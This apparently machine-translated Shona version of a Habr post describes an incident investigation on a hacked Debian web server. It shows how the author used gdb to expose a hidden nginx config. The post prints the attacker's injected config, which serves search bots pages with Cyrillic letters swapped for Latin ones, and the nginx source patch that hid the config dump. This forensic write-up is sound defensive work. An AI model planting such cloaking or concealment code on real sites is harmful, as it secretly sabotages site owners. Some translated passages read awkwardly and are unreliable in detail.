Imwe nyaya isingafadzi yakaitika kune imwe shamwari yangu. Asi kunyange zvazvo zvakanga zvisingafadzi kuna Mikhail, zvakangondinakidzawo.
Ndinofanira kutaura kuti shamwari yangu yakanaka UNIX-mushandisi: anogona kuisa iyo system pachake mysql, PHP uye ita zvigadziriso zviri nyore nginx.
Uye ane gumi nemaviri kana imwe nehafu mawebhusaiti akatsaurirwa maturusi ekuvaka.
Imwe yemasaiti aya akatsaurirwa kune chainsaws anogara akasimba muTOP yeinjini dzekutsvaga. Iyi saiti ndeye isiri-yekutengesa wongororo, asi mumwe munhu akapinda mutsika yekuirwisa. Izvozvo DDoS, vobva vaita hutsinye, vobva vanyora zvinonyadzisira votumira mhirizhonga kune vanotambira uye kuRKN.
Nenguva isipi, zvese zvakadzikama uye kudzikama uku kwakashanduka kuve kusina kunaka, uye saiti yakatanga zvishoma nezvishoma kusiya mitsetse yepamusoro yemhedzisiro yekutsvaga.
Icho chaive chirevo, ipapo ngano ya admin pachayo.
Yakanga yava kuda kurara foni payakarira: “San, hautarise server yangu here? Zvinoratidzika kwandiri kuti ndakabirwa, handikwanise kuzviratidza, asi manzwiro haana kundisiya kwevhiki rechitatu. Pamwe inguva yekuti ndirapwe paranoia?"
Zvakazotevera ikurukurirano yehafu yeawa inogona kupfupikiswa sezvizvi:
- ivhu rekubira rakanga rakaorera;
- munhu anorwisa anogona kuwana kodzero dzevashandisi vakuru;
- kurwiswa (kana kwakaitika) kwakanangidzirwa panzvimbo ino;
- nzvimbo dzine dambudziko dzakagadziriswa uye iwe unongoda kunzwisisa kana pakanga paine kupinzwa;
- iyo hack haigone kukanganisa iyo saiti kodhi uye dhatabhesi.
Nezve poindi yekupedzisira.
Iyo chete white frontend IP inotarisa kunze munyika. Hapana kuchinjana pakati pemashure uye kumberi kunze kwe http (s), vashandisi / mapassword akasiyana, hapana makiyi akatsinhaniswa. Pamakero egrey, ese madoko kunze kwe80/443 akavharwa. White backend IPs inozivikanwa chete kune vashandisi vaviri, avo Mikhail anovimba zvizere.
Yakaiswa kumberi Debian 9 uye nenguva iyo kufona kwaitwa, iyo system inoparadzaniswa nenyika nekunze firewall uye yakamiswa.
“Ok, ndipewo ndipinde,” ndakasarudza kumbomira kweawa. "Ndichaona nemaziso angu."
Pano uye zvimwe:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Kutsvaga inogona hack
Ndinotanga sevha, kutanga mukati kuponesa-modhi. Ndinoisa ma disks uye ndinofambisa mukati mawo chokwadi-matanda, nhoroondo, matanda ehurongwa, nezvimwewo, kana zvichibvira, ndinotarisa mazuva ekugadzirwa kwefaira, kunyange ndichinzwisisa kuti munhu anowanzo kuputika angadai "atsvaira" shure kwake, uye Misha akanga ato "tsika" zvakanyanya apo aizvitsvaga. .
Ini ndinotanga mune yakajairwa modhi, ndisati ndanyatsonzwisisa zvekutsvaga, ndinodzidza magadzirirwo. Chekutanga, ndinofarira nginx sezvo, kazhinji, hapana chimwe chinhu chiri pamberi kunze kwayo.
Iwo ma configs madiki, akanyatso kurongeka kuita gumi nemaviri mafaera, ini ndinongotarisa kuburikidza nawo katsi'oh mumwe nemumwe. Zvese zvinoita kunge zvakachena, asi haumboziva kana pane chandapotsa inosanganisira, rega ndinyore zvizere:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Ini handina kunzwisisa: "Iripi rondedzero?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Mubvunzo wechipiri unowedzerwa kumubvunzo wekunyora: "Nei shanduro yekare yenginx?"
Mukuwedzera, iyo sisitimu inotenda kuti yazvino vhezheni yakaiswa:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
ndiri kufona:
- Misha, sei wakaungana zvakare nginx?
- Mirira, ini handitomboziva kuti ndoita sei izvi!
- Zvakanaka, enda kunorara ...
Nginx inovakwa zvakare zvakajeka uye kuburitsa kwechinyorwa uchishandisa "-T" kwakavanzwa nechikonzero. Hapasisina kupokana nezve kubira uye iwe unogona kungozvigamuchira uye (sezvo Misha akatsiva sevha neitsva zvakadaro) funga dambudziko rakagadziriswa.
Uye zvechokwadi, sezvo mumwe munhu akawana kodzero mudzi'ah, saka zvine musoro kuita system reinstall, uye zvakashaya basa kutsvaga kuti chii chainetsa ipapo, asi apa kuda kuziva kwakakunda hope. Tingaziva sei zvavaida kutivanzira?
Ngatiedze kuronda:
$ strace nginx -T
Isu tinozvitarisa, pane zvakajeka kuti hapana mitsetse yakakwana mukutsvaga a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Kungonakidzwa chete, ngatienzanise zvakawanikwa.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ndinofunga chikamu chekodhi /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
yakaunzwa kune fomu:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
kana
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
saka rondedzero ne "-T" haina kuratidzwa.
Asi isu tingaone sei config yedu?
Kana kufunga kwangu kuri kwechokwadi uye dambudziko riri mukusiyana chete ngx_dump_config ngatiedze kuiisa tichishandisa gdb, rombo rakanaka kune kiyi --ne-cc-opt -g ikozvino uye tariro kuti optimization -O2 hazvizotikuvadzi. Panguva imwecheteyo, sezvo ini ndisingazivi kuti sei ngx_dump_config inogona kugadziriswa mukati nyaya 'T':, isu hatichadaidza ichi block, asi chiise uchishandisa nyaya 't':
Nei uchigona kushandisa '-t' uye '-T'Block Processing kana(ngx_dump_config) zvinoitika mukati kana(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Ehe, kana iyo kodhi yakashandurwa muchikamu ichi uye kwete mukati nyaya 'T':, ipapo nzira yangu haishande.
Test nginx.confSezvo tatogadzirisa dambudziko nekuyedza, zvakasimbiswa kuti kushomeka kunodiwa kuti iyo malware ishande. nginx mhando:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Tichazvishandisa kupfupisa muchinyorwa.
Tanga debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Mbichana mbichana:
- gadza breakpoint mubasa chikuru ()
- tanga chirongwa
- shandura kukosha kwekusiyana kunogadzirisa kubuda kwe config ngx_dump_config=1
- enderera / kupedzisa chirongwa
Sezvatinoona, iyo chaiyo config inosiyana neyedu, isu tinosarudza parasitic chidimbu kubva mairi:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ngatitarisei zviri kuitika pano zvakarongeka.
Vakatsunga Mushandisi-Mumiriri's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Mapeji ebasa haana kubatanidzwa Wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Uye kune avo vanowira pasi pezvose zviri pamusoro apa
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
muzvinyorwa HTML-mapeji anoshanduka 'O' pamusoro 'o' и 'A' pamusoro 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ndizvozvo, kunyengera chete ndiko 'a' != 'a' futi 'o' != 'o':
Saka, injini yekutsvaga bots inogashira, panzvimbo peyakajairwa 100% Cyrillic mavara, yakagadziridzwa marara yakadiridzwa neLatin. 'a' и 'o'. Ini handidi kukurukura kuti izvi zvinokanganisa sei SEO, asi hazvigoneke kuti jumble yemavara yakadaro iite zvakanaka pazvinzvimbo mumhedzisiro yekutsvaga.
Chii chandingati, varume vane fungidziro.
nezvakanyorwa
Source: www.habr.com